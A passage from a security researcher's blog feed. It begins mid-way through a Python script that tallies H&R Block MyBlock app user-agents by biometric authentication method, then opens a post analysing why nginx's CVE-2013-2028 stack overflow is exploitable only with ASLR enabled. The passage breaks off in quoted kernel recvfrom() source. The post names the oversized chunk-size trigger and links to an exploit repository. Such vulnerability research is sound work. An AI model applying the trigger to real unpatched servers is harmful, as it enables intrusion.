    <span class="n">res</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'ANDROID'</span><span class="p">:</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
        <span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">None</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'IOS'</span><span class="p">:</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
        <span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
            <span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">None</span>
    <span class="c1"># Cleanups:</span>
    <span class="c1"># 1) Some versions of the Android app prefix 'v' onto version</span>
    <span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'v'</span><span class="p">):</span>
        <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
    <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
    <span class="k">return</span> <span class="n">res</span>


<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="w">    </span><span class="sd">""" Validate that a line should be parsed and added to the buckets.</span>
<span class="sd">    Specifically, an entry should contain the right year, be an HRB user-agent,</span>
<span class="sd">    and contain the filter keyword if one was provided.</span>
<span class="sd">    """</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="c1"># Rows look like YYYY-MM-DD,user-agent,count, so the agent starts at index 11</span>
    <span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">if</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="nb">filter</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">False</span>
    <span class="k">return</span> <span class="kc">True</span>


<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'Usage:'</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s1">'<tax-year>'</span><span class="p">,</span> <span class="s1">'[filter]'</span><span class="p">,</span> <span class="s1">'<filepath>'</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="nb">filter</span> <span class="o">=</span> <span class="kc">None</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
        <span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
    <span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s1">'OS'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'IOS'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'ANDROID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'DEVICE'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'PHONE'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'TABLET'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'APP'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'AUTH'</span><span class="p">:</span> <span class="p">{</span>
            <span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'FACEID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
            <span class="s1">'N/A'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="s1">'VERSION'</span><span class="p">:</span> <span class="p">{},</span>
        <span class="s1">'BROWSER'</span><span class="p">:</span> <span class="p">{},</span>
    <span class="p">}</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
        <span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span>
        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot tokenize:'</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">))</span>
        <span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot subtokenize:'</span><span class="p">,</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">),</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
        <span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
            <span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Could not parse count from:'</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
            <span class="k">continue</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="n">buckets</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
        <span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">))</span>
</code></pre></div>
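<p>As an alternative to the positional token checks above, the same two user-agent layouts could be matched with a single regular expression. This is only a sketch, not the script that produced the numbers below: the pattern is inferred from the layouts in the script's docstring, and the names <code>AGENT_RE</code> and <code>parse_agent</code> are hypothetical.</p>

```python
import re

# Inferred layout: HRB-MOBILE-<OS>-<DEVICE>-MYBLOCK[-<AUTH>]-<VERSION>[-<BROWSER>]
# Some Android builds prefix the version with 'v', which the optional 'v?' drops.
AGENT_RE = re.compile(
    r'^HRB-MOBILE-(?P<os>IOS|ANDROID)-(?P<device>PHONE|TABLET)-(?P<app>MYBLOCK)'
    r'(?:-(?P<auth>TOUCHID|FACEID))?'
    r'-v?(?P<version>[^-]+)'
    r'(?:-(?P<browser>[^-]+))?$'
)


def parse_agent(agent):
    """Return a dict of user-agent fields, or None if the agent doesn't match."""
    match = AGENT_RE.match(agent)
    if match is None:
        return None
    fields = match.groupdict()
    if fields['auth'] and fields['os'] != 'IOS':
        return None  # auth keywords only appear in the iOS layout
    fields['auth'] = fields['auth'] or 'N/A'
    fields['browser'] = fields['browser'] or 'N/A'
    return fields


print(parse_agent('HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla'))
print(parse_agent('HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla'))  # None: not MyBlock
```

The trade-off is readability: one pattern documents the whole layout in a single place, while the original step-by-step checks make it easier to see exactly which field caused a line to be rejected.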
<h2>Results</h2>
<p>So here's what I uncovered, listed in no particular order:</p>
<ul>
<li>From January 7 through February 8, <strong>232,248</strong> requests were made by MyBlock
apps.</li>
<li><strong>230,226</strong> requests were made from phones while <strong>2,022</strong> were made from tablets; over
<strong>99%</strong> of the requests were phones.</li>
<li><strong>0</strong> requests were made by Android tablets.</li>
<li>Over <strong>99%</strong> of requests were made by devices running iOS.</li>
<li>Two versions of the app appear in the dataset: <strong>6.0.0</strong> and <strong>6.1.0</strong>.</li>
<li>Version 6.1.0 makes up over <strong>99%</strong> of the requests.</li>
<li>The first requests made by version 6.1.0 occurred on January 13, <strong>6</strong> days
after the first 6.0.0 request.</li>
<li><strong>100%</strong> of requests from Android devices were version 6.1.0.</li>
<li>The requests made from Android devices contain no information about
authentication method or browser.</li>
<li><strong>100%</strong> of requests from iOS contain "Mozilla" in the user-agent.</li>
</ul>
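<p>Observations such as when version 6.1.0 first appeared only require tracking the earliest date each version shows up. A minimal sketch, assuming rows have already been reduced to hypothetical <code>(date, version)</code> pairs with ISO-formatted dates; the function names are illustrative, and the rows simply reuse the first-seen dates reported above rather than the real dataset.</p>

```python
from datetime import date


def first_seen(rows):
    """Map each version to the earliest ISO date (YYYY-MM-DD) it appears on."""
    earliest = {}
    for day, version in rows:
        # ISO-formatted dates sort correctly as plain strings.
        if version not in earliest or day < earliest[version]:
            earliest[version] = day
    return earliest


def days_between(start, end):
    """Whole days from ISO date `start` to ISO date `end`."""
    return (date.fromisoformat(end) - date.fromisoformat(start)).days


# Illustrative rows only; note the out-of-order 6.1.0 dates.
rows = [('2018-01-07', '6.0.0'), ('2018-01-20', '6.1.0'), ('2018-01-13', '6.1.0')]
seen = first_seen(rows)
print(seen)                                        # {'6.0.0': '2018-01-07', '6.1.0': '2018-01-13'}
print(days_between(seen['6.0.0'], seen['6.1.0']))  # 6
```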
<p>And finally, the observations relevant to my question:</p>
<ul>
<li><strong>170,816</strong> requests used TouchID, <strong>15,323</strong> used FaceID,
and <strong>45,867</strong> showed neither keyword;
roughly <strong>74%</strong>, <strong>7%</strong>, and <strong>20%</strong>, respectively.</li>
<li><strong>0%</strong> of requests for version 6.0.0 on iOS used FaceID.</li>
</ul>
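<p>The authentication shares can be recomputed directly from the three raw counts listed above, as a percentage of their combined total (232,006, slightly below the 232,248 total requests) rounded to the nearest whole percent. Because each share is rounded independently, the results need not sum to exactly 100%.</p>

```python
# Raw counts from the observations above.
auth_counts = {'TOUCHID': 170816, 'FACEID': 15323, 'NEITHER': 45867}


def shares(counts):
    """Return each count's share of the total as a whole-number percentage."""
    total = sum(counts.values())
    return {key: round(100 * value / total) for key, value in counts.items()}


print(sum(auth_counts.values()))  # 232006
print(shares(auth_counts))        # {'TOUCHID': 74, 'FACEID': 7, 'NEITHER': 20}
```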
<h2>Discussion</h2>
<p>For the requests from iOS devices that didn't mention an authentication method
in their user-agent, I assume the user typed in a password or PIN, though I
haven't confirmed this. I also haven't looked into why all the iOS requests have
"Mozilla" at the end of their user-agent. It's probably related to the browser
framework used by the MyBlock app.</p>
<p>Judging by the fact that no requests from version 6.0.0 of the app used FaceID,
it's possible that this feature wasn't implemented until 6.1.0, though this is
just speculation.</p>
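<p>Checking whether FaceID ever appears with version 6.0.0 amounts to cross-tabulating version against authentication method. A minimal sketch using <code>collections.Counter</code>, assuming hypothetical <code>(version, auth, count)</code> tuples produced by a parser like the script above; the records here are made up for illustration.</p>

```python
from collections import Counter


def crosstab(records):
    """Sum request counts for every (version, auth) pair."""
    table = Counter()
    for version, auth, count in records:
        table[(version, auth)] += count
    return table


# Made-up records; in practice these would come from parsed user-agents.
records = [
    ('6.0.0', 'TOUCHID', 5),
    ('6.1.0', 'FACEID', 3),
    ('6.1.0', 'TOUCHID', 7),
    ('6.0.0', 'TOUCHID', 2),
]
table = crosstab(records)
print(table[('6.0.0', 'TOUCHID')])  # 7
print(table[('6.0.0', 'FACEID')])   # 0, since a Counter returns 0 for missing keys
```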
<p>Most notably, users appear to be comfortable using Apple's TouchID
to protect their MyBlock app. Perhaps more surprising is that people are also comfortable
using FaceID, considering that this feature is relatively new. At least among
MyBlock users on iOS, biometric authentication appears to be widely accepted.</p>
<p>It's also worth mentioning that while MyBlock doesn't appear to have been available during
the 2017 tax season, another H&R Block app does appear:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla
</code></pre></div>
<p>This app seems to have two versions: 6.4 and 6.3, but the total number of
requests is very low; only a few thousand. Another interesting finding is
<strong>13</strong> requests made on April 26, 2017 with this user-agent:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla
</code></pre></div>
<p>Perhaps this was a test version of the app?</p>
<h2>Future Work</h2>
<p>We still have 2 months to go in this year's tax season, so I'll be interested
to check the numbers once the season closes. I'm also interested to see how
many people continue to use this app outside of the tax season and how these
results will change in 2019.</p>How ASLR Helps Enable Exploits (CVE-2013-2028)2017-12-16T11:30:00-05:002017-12-16T11:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-12-16:/aslr-enables-exploit.html<p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is <strong>enabled</strong></em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly <em>worsen</em> the security of an application? Driven by
curiosity, we decided to find the root cause of this result. Ultimately, we
had to go all the way to the Linux kernel code to find our answer. What we
found was a kernel quirk that can't really be called a bug from the kernel's
perspective, but does go against the expectations of the user.
So without further ado, allow
me to share how ASLR can enable the exploitation of applications.</p>
<p>For those unfamiliar with CVE-2013-2028, all you need to know is that it's an
exploitable stack buffer overflow in older versions of nginx that can be
triggered by specially crafted HTTP requests.
The bug occurs because a user-supplied integer that is intended to be an
unsigned value is mistakenly cast to a signed value for part of its lifetime.
If an attacker passes a sufficiently large value, the worker process handling the
request will copy too much data from its network socket into a fixed-size buffer,
smashing the stack.
For the curious reader, a more in-depth analysis is available
<a href="https://www.vnsecurity.net/research/2013/05/21/analysis-of-nginx-cve-2013-2028.html">here</a>
and a repository for reproducing it is available
<a href="https://github.com/kitctf/nginxpwn">here</a>.</p>
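<p>The heart of this bug class is that the same 64 bits mean very different things depending on whether they are read as signed or unsigned. The sketch below is a generic illustration, not nginx's actual code: the helper names and the 1024-byte buffer size are hypothetical. It shows how a length check performed on the signed view can pass even though the unsigned view of the same bits is enormous.</p>

```python
MASK64 = (1 << 64) - 1


def as_signed64(value):
    """Reinterpret the low 64 bits of `value` as a two's-complement signed integer."""
    value &= MASK64
    return value - (1 << 64) if value >= (1 << 63) else value


def as_unsigned64(value):
    """Reinterpret the low 64 bits of `value` as an unsigned integer."""
    return value & MASK64


BUF_SIZE = 1024  # hypothetical fixed-size stack buffer

claimed = 0xaaaaaaaaaaaaaaaa        # attacker-supplied chunk size
signed_view = as_signed64(claimed)  # negative, because the top bit is set

# A bounds check on the signed value wrongly concludes the data fits...
fits = signed_view <= BUF_SIZE
# ...but a copy routine that takes an unsigned length sees the huge value.
copy_len = as_unsigned64(signed_view)

print(signed_view)          # -6148914691236517206
print(fits, hex(copy_len))  # True 0xaaaaaaaaaaaaaaaa
```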
<p>So why is this bug only exploitable when ASLR is turned on? We can find the
user space answer with a simple <code>strace</code>. If we make a chunked HTTP request and
claim the total size is going to be <code>0xaaaaaaaaaaaaaaaa</code>, nginx's worker will
make a <code>recvfrom()</code> system call for <code>0xaaaaaaaaaaaaaab0</code> bytes from the network
socket. When ASLR is turned on, the Linux kernel will copy our request (which is
not actually <code>0xaaaaaaaaaaaaaaaa</code> bytes long) into the worker's buffer, smashing
the stack. However, when ASLR is turned off, the kernel will return <code>-EFAULT</code> and
the worker will safely report the error and close the session.</p>
<p>We could stop here, but Hong and I were not satisfied. Why is the kernel returning
<code>-EFAULT</code> when ASLR is disabled but not when it is enabled? The space allocated for
the stack is the same in both cases, so that can't be the problem. The only obvious
difference is ASLR moves the stack's address range to randomize it. When ASLR
is disabled, the stack's highest address is placed at the boundary between user and
kernel space, which is <code>0x7fffffffffff</code> in Linux kernels compiled for <code>x86_64</code>. However,
<code>0xaaaaaaaaaaaaaab0</code> is such a large number that it shouldn't matter where the stack is
placed: the requested range can't fit in the stack's memory segment and will cross the
boundary either way. So what's really happening in the kernel when it handles a <code>recvfrom()</code>
system call?</p>
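<p>The intuition in the previous paragraph can be checked with a little arithmetic. The sketch below uses the <code>0x7fffffffffff</code> boundary given above and two hypothetical buffer addresses: one near the top of user space (as with ASLR disabled) and one made-up randomized placement lower down. In both cases the requested range runs far past the boundary, so the stack's position alone doesn't obviously explain the different outcomes.</p>

```python
USER_SPACE_END = 0x7fffffffffff    # user/kernel boundary on x86_64, as stated above
REQUEST_LEN = 0xaaaaaaaaaaaaaab0   # length nginx passed to recvfrom()


def last_byte(addr, length):
    """Address of the last byte in [addr, addr + length)."""
    return addr + length - 1  # Python ints never wrap, unlike 64-bit C arithmetic


# Hypothetical buffer addresses, chosen only for illustration.
buffers = {
    'ASLR off (near the top of user space)': 0x7fffffffe000,
    'ASLR on (a made-up randomized address)': 0x7ffc12345000,
}

for label, addr in buffers.items():
    end = last_byte(addr, REQUEST_LEN)
    print(f'{label}: ends at {hex(end)}, past boundary: {end > USER_SPACE_END}')
```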
<p>Taking a look at Linux's
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/net/socket.c#L1665">implementation</a>
of <code>recvfrom()</code>, we see the following code:</p>
<div class="highlight"><pre><span></span><code><span class="n">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">recvfrom</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span>
<span class="w">        </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">flags</span><span class="p">,</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span>
<span class="w">        </span><span class="kt">int</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">)</span>
<span class="p">{</span>
<span class="w">    </span><span class="k">struct</span><span class="w"> </span><span class="nc">socket</span><span class="w"> </span><span class="o">*</span><span class="n">sock</span><span class="p">;</span>
<span class="w">    </span><span class="k">struct</span><span class="w"> </span><span class="nc">iovec</span><span class="w"> </span><span class="n">iov</span><span class="p">;</span>
<span class="w">    </span><span class="k">struct</span><span class="w"> </span><span class="nc">msghdr</span><span class="w"> </span><span class="n">msg</span><span class="p">;</span>
<span class="w">    </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_storage</span><span class="w"> </span><span class="n">address</span><span class="p">;</span>
<span class="w">    </span><span class="kt">int</span><span class="w"> </span><span class="n">err</span><span class="p">,</span><span class="w"> </span><span class="n">err2</span><span class="p">;</span>
<span class="w">    </span><span class="kt">int</span><span class="w"> </span><span class="n">fput_needed</span><span class="p">;</span>

<span class="w">    </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
<span class="w">    </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="w">        </span><span class="k">return</span><span class="w"> </span><span class="n">err</span><span class="p">;</span>
<span class="w">    </span><span class="n">sock</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sockfd_lookup_light</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">err</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">fput_needed</span><span class="p">);</span>
<span class="w">    </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">sock</span><span class="p">)</span>
<span class="w">        </span><span class="k">goto</span><span class="w"> </span><span class="n">out</span><span class="p">;</span>

<span class="w">    </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_control</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
<span class="w">    </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_controllen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w">    </span><span class="cm">/* Save some cycles and don't copy the address if not needed */</span>
<span class="w">    </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">addr</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">address</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
<span class="w">    </span><span class="cm">/* We assume all kernel code knows the size of sockaddr_storage */</span>
<span class="w">    </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w">    </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iocb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
